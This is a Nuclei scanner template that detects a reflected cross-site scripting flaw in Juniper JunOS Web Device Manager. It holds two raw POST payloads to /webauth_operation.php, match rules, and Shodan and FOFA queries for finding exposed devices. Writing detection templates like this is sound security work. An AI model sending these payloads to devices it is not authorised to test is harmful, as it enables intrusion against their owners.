nuclei-templates/http/vulnerabilities/juniper/junos-xss.yaml

55 lines
1.6 KiB
YAML

id: junos-xss
info:
name: JunOS - Cross-Site Scripting
author: DhiyaneshDK
severity: medium
reference:
- https://labs.watchtowr.com/the-second-wednesday-of-the-first-month-of-every-quarter-juniper-0day-revisited/
classification:
cpe: cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: juniper
product: junos
shodan-query: title:"Juniper Web Device Manager"
fofa-query: title="Juniper Web Device Manager"
tags: junos,xss
variables:
string: "{{to_lower(rand_base(2))}}"
http:
- raw:
- |
POST /webauth_operation.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
rs=emit_debug_note&rsargs[]={{string}}&rsargs[]=<script>alert('document.domain');</script>
- |
POST /webauth_operation.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
rs=sajax_show_one_stub&rsargs[]={{string}}<script>alert('document.domain');</script>
stop-at-first-match: true
matchers-condition: or
matchers:
- type: word
name: emit-debug-note-xss
words:
- "ERROR: <script>alert('document.domain');</script>"
- "monospace"
condition: and
- type: word
name: sajax-show-one-stub-xss
words:
- "<script>alert('document.domain');</script>"
- "wrapper for"
condition: and
# digest: 490a0046304402207bac5270d60e93e8c0917e948d364d49fa4b326f8ab53b07e2411d736bbedea3022015b5724be40867e52634c42f62d4efb59de6b96634fb125e90fad2aaac245d7b:922c64590222798bb761d5b6d8e72950